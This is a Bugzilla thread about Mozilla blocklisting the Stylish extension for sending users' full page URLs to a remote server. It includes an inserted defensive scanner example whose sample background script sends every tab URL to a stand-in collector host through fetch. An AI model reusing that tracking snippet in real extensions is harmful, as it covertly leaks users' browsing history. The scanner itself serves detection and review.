Blocklist Stylish add-on - sends full page urls to remote server

Status: RESOLVED FIXED
Product: Toolkit
Component: Blocklisting
Reported: 19 days ago
Modified: 13 days ago
People: Reporter: mike.maccana, Assigned: TheOne
Firefox Tracking Flags: (Not tracked)

(Reporter)

Description

19 days ago
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Build ID: 20180628175621

Steps to reproduce:

The 'Stylish' extension was recently sold and the new company now logs all browser history. 

https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

This likely also affects Firefox. The extension is available on the extension store and also on https://addons.mozilla.org/en-GB/firefox/addon/stylish/?src=search and has 300K users.


Actual results:

Store my internet history


Expected results:

Didn't steal my internet history
(Reporter)

Updated

19 days ago
Summary: Stylish extension is records all intrnet history and should be blocked / removed from extensions store / removed from FF → Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF

Updated

19 days ago
Component: Untriaged → Blocklisting
OS: Unspecified → All
Product: Firefox → Toolkit
Hardware: Unspecified → All
(Reporter)

Updated

19 days ago
Summary: Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF → Stylish extension records all history and should be blocked / removed from extensions store / removed from FF

Updated

19 days ago
Status: UNCONFIRMED → NEW
Ever confirmed: true

Updated

19 days ago
Summary: Stylish extension records all history and should be blocked / removed from extensions store / removed from FF → Blocklist Stylish add-on - sends full page urls to remote server
(Assignee)

Comment 1

18 days ago
We decided to block because of violation of data practises outlined in the review policy.
Assignee: nobody → awagner
(Assignee)

Comment 2

18 days ago
The block has been staged. Philipp, could you please review and approve?
Flags: needinfo?(philipp)
Comment 3

Done
Status: NEW → RESOLVED
Last Resolved: 18 days ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED

Comment 4

18 days ago
I see, with this bug, that Stylish is blocked, and why.

However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for "more information".  I have Stylish version 3.1.1

The URL for more information directs the user to:  https://blocked.cdn.mozilla.net/i19.html
That webpage refers to version 1.1b1 of Stylish, and a block request date of March 2011.  It does not refer to this bug 1472948, rather to the old bug 621660 from March 2011.

Comment 5

18 days ago
(In reply to john ruskin from comment #4)
> However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for
> "more information".  
I've filed https://bugzilla.mozilla.org/show_bug.cgi?id=1473194 for this as it might be an orthogonal concern to this bug.

Comment 6

The correct block page is https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

Which tells me "Why was it blocked? This add-on violates data practices outlined in the review policy."

As a user that's not particularly helpful. You've just disabled a feature of the browser that I liked, and justified that with a vague mention of "data practises". That won't mean much to most users. Are we able to rephrase / expand that so your average person understands why they can't use Stylish any more?

Additionally there is no suggested action, other than to live without the feature that the extension offered. Could we point users to https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish fork without the spyware?
(Reporter)

Comment 7

18 days ago
Original reporter here: does this mean Stylish will get removed / cleaned from existing Firefox installations?

Comment 8

18 days ago
(In reply to mike.maccana from comment #7)
> Original reporter here: does this mean Stylish will get removed / cleaned
> from existing Firefox installations?

It will be disabled, not removed. Users will get a warning though with a request to (optionally) restart the browser.
(Reporter)

Comment 9

18 days ago
(In reply to Peter Wu from comment #8)

Thanks Peter.

Comment 10

17 days ago
(In reply to Ian Thomas ('thelem') from comment #6)
> Additionally there is no suggested action, other than to live without the
> feature that the extension offered. Could we point users to
> https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish
> fork without the spyware?

I don't know whether that is permissible, but users definitely will need assistance. There already are a number of "what's going on" threads on the Stylish forums, but many users may not know about this site: https://forum.userstyles.org/categories/stylish

Comment 11

16 days ago
According to the linked article, Stylish has been stealing browser history data since January 2017. Mozilla and the user community are apparently just finding out about this now, a year and a half later. The extension has been in the system, displaying the offending behavior, the entire time.

I think there's a broader bug here, along the lines of "extensions can get away with malicious behavior for a long time without anyone noticing", or "it is possible and profitable to buy and maliciously monetize popular extensions", or even "extension developers don't get paid for their work and so have an incentive to sell out".

Comment 12

16 days ago
Thanks, people. 

(In reply to Peter Wu from comment #8)

> It will be disabled, not removed. …

No alert for legacy 2.1.1. This seems proper. 

Stylish 3.1.1 block-listed and disabled, 2.1.1 enabled : waterfox
<https://new.reddit.com/comments/8wd5wu/-/>

(In reply to Ian Thomas ('thelem') from comment #6)

> The correct block page is
> https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

I was directed to <https://blocked.cdn.mozilla.net/i1900.html>. 

I guess that the two URLs are synonymous.

(In reply to jscher2000 from comment #10)

> … a number of "what's going on" threads on the Stylish forums, …

https://web.archive.org/web/*/https://forum.userstyles.org/discussion/67684/no-longer-available-on-amo captures the first.

Comment 13

16 days ago
Hi anovak, I think the relevant date is more recent. 

Stylish for Chrome first got the behavior of sending the current tab URL to the publisher to get script recommendations as an "opt out" feature. It was clear that for Firefox, it would have to be an "opt in" feature to comply with policy.

When the WebExtensions port was released around November 10, 2017, its default setting appears to have been correct, and there was not even an opt-in/opt-out checkbox. People who checked did not observe the api.userstyles.org calls in the Browser Console in version 3.0.1. I still have that XPI if anyone wants to check it: https://www.jeffersonscher.com/temp/Stylish301Fx/

Version 3.0.5 was released on April 24, 2018 -- I have no XPI or other information

Version 3.1.1 was released on May 23, 2018 -- coincidentally (?), the release was one day after SimilarWeb updated its privacy policy. This version has the impermissible opt-out feature from the Chrome extension -- user is automatically opted in to data sharing.

Since data sharing (exfiltration) is a policy (user consent) issue and not a specific function, I can't imagine how an automated review would catch the change. But flagging extensions that use fetch and XMLHttpRequest for human review could be helpful. Whether that would have caught this within the six weeks since 3.1.1 was released, I have no idea.
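Comment 13 suggests flagging extensions that use fetch and XMLHttpRequest for human review. The following is an added example, not code from this bug, from Mozilla's review tooling or from Stylish: a small static triage pass over unpacked extension sources that lists the network APIs and remote hostnames per file and notes whether the same file reads tab URLs. The file names, the hostname and the sample scripts are constructed.

```javascript
// Added example, not code from the bug, Mozilla or Stylish: a static triage pass
// over unpacked WebExtension sources. It flags the network-sending APIs comment 13
// names (fetch, XMLHttpRequest, plus navigator.sendBeacon), lists hostnames of URL
// literals in the same file, and notes whether that file also reads tab URLs.
const NETWORK_APIS = [
  { name: 'fetch', re: /\bfetch\s*\(/ },
  { name: 'XMLHttpRequest', re: /\bnew\s+XMLHttpRequest\b/ },
  { name: 'sendBeacon', re: /\bnavigator\.sendBeacon\s*\(/ },
];
// Signs that a script looks at browsing activity (tab events or tab.url).
const TAB_URL_RE = /\btabs\.(onUpdated|query|get)\b|\.url\b/;
const URL_LITERAL_RE = /["'`](https?:\/\/[^"'`\s]+)["'`]/g;

// Hostnames of every absolute http(s) URL literal in a source file.
function hostnamesIn(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_LITERAL_RE)) {
    try { hosts.add(new URL(m[1]).hostname); } catch (_) { /* skip malformed */ }
  }
  return [...hosts].sort();
}

// files: { 'background.js': '<source>', ... } -> one finding per file that can
// send data off the machine; files with no network API are skipped. The result
// is a worklist for a human reviewer, not a malware verdict.
function scanExtensionSources(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    const apis = NETWORK_APIS.filter(({ re }) => re.test(source)).map(({ name }) => name);
    if (apis.length === 0) continue;
    findings.push({ path, apis, hosts: hostnamesIn(source), readsTabUrls: TAB_URL_RE.test(source) });
  }
  return findings;
}

// Constructed sample inputs (hypothetical, not real Stylish code): a background
// script that reports every completed tab URL to a remote host, and a benign popup.
const SAMPLE_FILES = {
  'background.js': `
    browser.tabs.onUpdated.addListener((id, info, tab) => {
      if (info.status === 'complete') {
        fetch('https://collector.example.invalid/track?u=' + encodeURIComponent(tab.url));
      }
    });`,
  'popup.js': `document.getElementById('save').onclick = () => browser.storage.local.set({ on: true });`,
};

for (const f of scanExtensionSources(SAMPLE_FILES)) {
  console.log(`${f.path}: ${f.apis.join(', ')} -> ${f.hosts.join(', ')}; reads tab URLs: ${f.readsTabUrls}`);
}
```

A real review pipeline would run this over every file in the unpacked XPI and diff the findings between versions, which is exactly the kind of change (3.0.1 to 3.1.1) comment 13 describes.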

Comment 14

16 days ago
Previous versions of Stylish for Firefox did not include this behavior. A recent version did, and that is why it was blocked.

Stylus is an alternative, so feel free to recommend it to people. We are also in the process of providing more support to affected users.

Please post any additional questions in our discussion forum: https://discourse.mozilla.org/c/add-ons

Comment 15

Thank you everyone for the comments and inquiries you have made here, I understand this is an issue that brings up a lot of questions. At the same time, this is a bug tracker meant mostly for technical discussion around the actions taken.

Therefore, I am restricting comments to this bug. If you have further questions, please follow the link to our discussion forums Amy posted in the previous comment. Thank you for your understanding.
Restrict Comments: true
(Assignee)

Updated

16 days ago
Duplicate of this bug: 1473719
We have pushed a Heartbeat message to Stylish users, giving them Styl-us as an option.
status-firefox62: --- → affected
status-firefox62: affected → ---
Version: 62 Branch → unspecified